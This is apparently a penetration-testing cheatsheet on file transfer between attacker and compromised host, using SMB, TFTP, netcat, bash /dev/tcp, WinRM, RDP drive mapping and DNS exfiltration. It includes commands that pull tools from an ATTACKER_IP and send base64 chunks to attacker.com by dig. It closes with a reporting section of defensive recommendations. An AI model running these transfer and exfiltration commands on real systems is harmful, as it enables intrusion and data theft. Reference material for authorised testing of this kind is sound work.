π‘οΈ Methodology Checklist
- SMB server:
impacket-smbserver share . -smb2support -user [USER] -password [PASS] - Windows SMB copy:
net use \\[LHOST]\share /user:[USER] [PASS]thencopy \\[LHOST]\share\[FILE] - FTP upload: host pyftpdlib server, connect from target
- TFTP (Windows XP/2003):
tftp -i [LHOST] GET [FILE] - RDP clipboard paste for small files
- Verify all transferred files are cleaned up post-engagement
π― Operational Context
Use when: Standard HTTP/SCP/SMB transfer methods are all blocked β reach for edge-case channels: RDP clipboard, TFTP, FTP anonymous push, DNS exfil. Think Dumber First: RDP clipboard paste is the most overlooked transfer method β if you have RDP, open notepad, paste base64-encoded content from clipboard, save file, decode. No network rules fire. Skip when: Standard methods work β misc techniques add complexity with no benefit.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nc -lvnp [PORT] > [FILE] | Netcat listener β receive file (victim listens) |
nc -q 0 [TARGET_IP] [PORT] < [FILE] | Netcat send file to listener |
ncat -l -p [PORT] --recv-only > [FILE] | Ncat receiver (closes after transfer) |
ncat --send-only [TARGET_IP] [PORT] < [FILE] | Ncat sender (terminates after input sent) |
sudo nc -l -p 443 -q 0 < [FILE] | Attacker listens, serves file (reverse nc transfer) |
nc [TARGET_IP] 443 > [FILE] | Victim connects to attacker, receives file |
sudo nc -l -p 443 -q 0 < [FILE] | Attacker serves via nc (attacker-listens style) |
cat < /dev/tcp/[TARGET_IP]/443 > [FILE] | Bash /dev/tcp receive (no nc needed) |
Test-NetConnection -ComputerName DATABASE01 -Port 5985 | WinRM connectivity check |
$Session = New-PSSession -ComputerName DATABASE01 | Create WinRM PSSession |
Copy-Item -Path C:\file.txt -ToSession $Session -Destination C:\Users\Admin\Desktop\ | Upload via WinRM session |
Copy-Item -Path "C:\Users\Admin\Desktop\file.txt" -Destination C:\ -FromSession $Session | Download via WinRM session |
rdesktop [TARGET_IP] -d [DOMAIN] -u [USER] -p '[PASS]' -r disk:linux='/home/user/files' | Mount local dir into RDP (rdesktop) |
xfreerdp3 /v:[TARGET_IP] /d:[DOMAIN] /u:[USER] /p:'[PASS]' /drive:linux,/home/user/files | Mount local dir into RDP (xfreerdp) |
π¬ Deep Dive & Workflow
Netcat Transfer Patterns
Pattern A β Victim Listens (Inbound Allowed):
# Victim (receiver)
nc -lvnp 8000 > received.exe
# Attacker (sender)
nc -q 0 [VICTIM_IP] 8000 < tool.exeUse when: No inbound firewall blocking on victim.
Pattern B β Attacker Listens (Inbound Blocked on Victim):
# Attacker (serves file)
sudo nc -l -p 443 -q 0 < tool.exe
# Victim (connects and receives)
nc [ATTACKER_IP] 443 > tool.exeUse when: Victim behind firewall blocking inbound. Victim βcalls home.β
Pattern C β Bash /dev/tcp (No nc on Victim):
# Attacker
sudo nc -l -p 443 -q 0 < tool.exe
# Victim (pure bash, no tools needed)
cat < /dev/tcp/[ATTACKER_IP]/443 > tool.exeCritical fallback when nc has been stripped from the target.
WinRM / PSSession File Transfer
Requires: Admin rights, membership in Remote Management Users group, ports TCP/5985 (HTTP) or TCP/5986 (HTTPS).
$Session = New-PSSession -ComputerName DATABASE01
# Upload (local β remote)
Copy-Item -Path C:\tool.exe -ToSession $Session -Destination C:\Windows\Temp\
# Download (remote β local)
Copy-Item -Path "C:\loot.zip" -Destination C:\ -FromSession $SessionUseful when HTTP/SMB are blocked but WinRM is allowed (common in enterprise networks).
RDP Drive Mapping
Mounted share appears at \\tsclient\<sharename> inside the RDP session:
- Navigate to
\\tsclient\linuxin File Explorer - Copy/paste files as normal
- Best for large files (BloodHound ingestors, mimikatz) β avoids AV network filters
Firewall Decision Matrix
| Inbound to Victim | Outbound from Victim | Best Method |
|---|---|---|
| Allowed | Allowed | Pattern A (victim listens) |
| Blocked | Allowed | Pattern B (attacker listens) |
| Blocked | Blocked | WinRM, RDP drive, Base64 |
| No tools | Allowed | Bash /dev/tcp |
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| RDP clipboard transfer fails | Clipboard redirection disabled | Check RDP session settings; enable via Group Policy or /clipboard flag in xfreerdp |
| TFTP transfer times out | UDP blocked | Confirm: nmap -sU -p 69 [TARGET]; TFTP is UDP-only β TCP alternatives wonβt work |
| DNS exfil too slow | Large file | Use for small files only (<10KB); split and exfil in chunks: dig $(base64 chunk).attacker.com |
| FTP anonymous push rejected | FTP anonymous write not enabled | Confirm: ftp [TARGET] β login anon β put file β check write permission |
| WebDAV upload returns 405 | PUT method disabled | Enable PUT in web server config or use PROPFIND first to confirm WebDAV is active |
π Reporting Trigger
Finding Title: Alternative File Transfer Channel Bypasses Standard Controls Impact: Edge-case transfer methods (RDP clipboard, TFTP, DNS) evade network controls focused on HTTP/SMB, enabling payload delivery and data exfiltration through unconventional channels. Root Cause: Security monitoring focused on common protocols fails to detect transfers via alternative channels. RDP clipboard redirection and TFTP are often explicitly permitted for IT operations. Recommendation: Restrict RDP clipboard redirection in GPO for untrusted sessions. Block TFTP (UDP/69) at the perimeter. Implement DNS query monitoring to detect unusual query volumes indicative of DNS exfiltration.